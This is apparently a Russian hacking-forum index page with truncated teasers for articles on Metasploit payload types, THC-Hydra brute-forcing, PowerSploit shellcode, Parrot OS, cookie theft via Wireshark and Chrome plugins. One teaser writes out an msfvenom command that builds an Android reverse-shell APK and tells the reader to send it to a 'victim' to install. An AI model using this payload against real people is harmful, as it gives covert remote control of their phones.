Информац. безопасность

По данным последних исследований IT, каждые четыре секунды в компьютерную сеть компании попадает вредоносная программа и каждые 32 минуты за пределы организации уходит ценная информация. Утерянные данные могут стать источником манипуляций, поэтому так важно выстроить максимально эффективную защиту. Обеспечить информационную безопасность можно сотнями способов, сочетая разные продукты – антивирусы, межсетевые экраны, SSL-сертификаты, разграничение правд доступа, системы защиты от DDoS-атак. Важнейшей стороной информационной безопасности становится определение угроз, а это невозможно без определения объектов защиты. Только поняв, что и от чего мы защищаем, можно выстроить грамотную оборону. Сейчас актуален переход к облачным решениям, которые дают возможность быстро развёртывать системы безопасности, отдавая их управление поставщикам облачных сервисов. В этом разделе собраны актуальные материалы об информационной безопасности от построения информационной защиты до её оптимизации.

Статья Типы полезных нагрузок (Payloads)

  • 12 156
  • 4
Всем привет, в этой статье я хочу подробно рассмотреть тему полезных нагрузок (Payload), их особенности и типы. Я полагаю, новичкам будет интересно узнать, с чем они имеют дело, и как это работает. В качестве примера будем рассматривать Metaslpoit Framework, так как он содержит различные уникальные типы полезных нагрузок.

Рассмотрим различные типы Payloads:

Встроенная (Не поэтапная)

· Одиночная полезная нагрузка, содержащая эксплоит и полный шеллкод, для выбранной задачи. Встроенные пайлоады более стабильны, чем некоторые другие, потому что они содержат все инструменты в одном файле. Однако есть эксплойты, которые не поддерживают полученный размер этих полезных нагрузок, в результате компиляции.

Meterpreter

· Короткая форма мета-интерпретатора, которая является передовой на данный момент, а так же многогранной в плане применения. Работает с помощью инъекции DLL. Meterpreter полностью находится в памяти удаленного хоста и не оставляет никаких данных...

Статья THC-Hydra инструкция для чайников

  • 35 965
  • 5
C
Hydra нельзя отнести к простым и легко дающимся новичкам. Не надо отчаиваться, если вам не удалось оседлать hydra, я рекомендую вам посмотреть на программу BruteX. Она автоматизирует процесс подбора, более того, она использует ту же самую hydra, но сама вводит необходимые ключи и не нужно искать файлы с именами и паролями, поскольку они поставляются вместе с программой.

ПРОТОКОЛ — это протокол, который вы хотите атаковать, например, ftp, smtp, http-get или любой из доступных: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 и v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC и XMPP...

PowerShell для хакера (часть I )

  • 31 713
  • 50
Часть 1
Следующая часть
Все части

Приветствую Вас колеги. Как Вы уже поняли речь пойдет о знакомствах с базовыми возможностями PowerShell и области применения хакерских техних.
И начнем мы пожалуй сегодня с использования скриптов PowerSploit -( скрипты написанные на PowerShell для пост эксплуатации Windows систем)

Первым примером использования PowerSploit - это будет пример простого и быстрого получения метерпретер сессии на примере скрипта Invoke-Shellcode.ps1

Для начало сходим на гитхаб по ссылке:
Код:
https://github.com/cheetz/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1
1.PNG


Жмакним на клавишу RAW - что бы...

Статья Parrot Security OS

  • 61 959
  • 126
Привет, в этой статье речь пойдет о достаточно новой операционной системе Parrot.

Parrot Security OS (или ParrotSec) - является дистрибутивом GNU / Linux, на основе Debian. Он был спроектирован для того, чтобы выполнять тесты на проникновение (компьютерная безопасность) для оценки уязвимостей и смягчения последствий их использования, применяется он и в компьютерной криминалистике, а так же способен обеспечить анонимный серфинг. Был разработан командой Frozenbox.

Среда рабочего стола является MATE, и менеджер дисплея по умолчанию LightDM.

Проект сертифицирован для работы с машинами, которые имеют, по крайней мере, 256 Мб оперативной памяти, и одинаково подходит как для 32-разрядных (i386) так и для 64-разрядных (amd64) процессоров. Кроме того, проект доступен для ARMv7 (armhf) архитектур. Он даже предлагает релиз (32bit и 64bit), разработанный для серверов, только для выполнения облачного тестирования.

Чтобы установить эту ОС себе необходимо скачать образ (торрент) с...

Soft Metasploit для будущих хакеров (msfvenom payload): Взломайте любой телефон на Android

  • 60 651
  • 25
Утилита Msfvenom в дистрибутиве kali linux используется для взлома android. Является комбинацией утилит Msfpayload и Msfencode, объединившей в себе оба инструмента в одну платформу Framework instance под названием msfvenom payload.

Установка и использование msfvenom payload:

1. Запустите kali и откройте панель управления.
2. Установите payload и создайте всплывающее окно пользователя вот этой командой:
Код:
root@kali:-# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apk
(Для того чтобы узнать свой LHOST, откройте новый терминал и введите ifconfig)

Файл apk сохранен в базовую папку.
Примечание: Нигде не добавляйте лишних символов и пробелов. Используйте команду в формате «как есть»( после изменения LHOST и LPORT как необходимо).
3. Передайте/ отправьте по e-mail этот файл (andro.apk) на телефон жертвы и запустите установку.
4...

Статья Arduino — это электронный конструктор и удобная платформа быстрой разработки электронных устройств

  • 6 578
  • 11
Arduino — это электронный конструктор и удобная платформа быстрой разработки электронных устройств для новичков и профессионалов. Платформа пользуется огромной популярностью во всем мире благодаря удобству и простоте языка программирования, а также открытой архитектуре и программному коду. Устройство программируется через USB без использования программаторов.

Arduino позволяет компьютеру выйти за рамки виртуального мира в физический и взаимодействовать с ним. Устройства на базе Arduino могут получать информацию об окружающей среде посредством различных датчиков, а также могут управлять различными исполнительными устройствами.

Микроконтроллер на плате программируется при помощи языка Arduino (основан на языке Wiring) и среды разработки Arduino (основана на среде Processing). Проекты устройств, основанные на Arduino, могут работать самостоятельно, либо же взаимодействовать с программным обеспечением на компьютере (напр.: Flash, Processing, MaxMSP). Платы могут быть собраны...

Статья Как украсть Cookies (Wireshark + Parrot)

  • 9 905
  • 3
И так поскольку мы начинаем цикл изучения Parrot Security OS я решил не оставаться без участия и выложить простой материал по данной теме. Нам с вами известно что программа обладает незаменимым для нас функционалом.

Ее самая приятная функций это перехват всего и вся для последующего анализа что часто отпугивает новичков от этого сокровища.(Возможно есть что-то другое но тут уж вы меня простите)

Но я не стану вам объяснять все с самого начала а дам ссылочку -> Как пользоваться Wireshark .

На нашем Попугае (Parrot Security OS я ее так называю) немного изменен дизайн программы но все нужное...

Статья Хакерские плагины для Chrome

  • 8 069
  • 0
Это аналог статьи «Хакерские плагины для Firefox», т. е. если вы пользуетесь Firefox (а не Chrome), то вы знаете что делать.

Все программы, в том числе и плагины, всегда скачивайте с официальных сайтов. Для плагинов браузера Chrome официальным сайтом является . Пусть нас не смущает слово «магазин» — все рассматриваемые ниже плагины бесплатные.

Cookie Manager

Управляет cookies и защищает приватность. Добавляет, редактирует и удаляет кукиз через панель инструментов. Может искать кукиз, если их много.

Функции
  • Поиск по кукиз
  • Просмотр всех кукиз
  • Просмотр кукиз по поддоменам
  • Просмотр кукиз текущего домена
  • Удаление всех кукиз (примечание: некоторые кукиз повторно создают себя после удаления. Поэтому они могут появиться вновь в списке после удаления)
  • Удалить...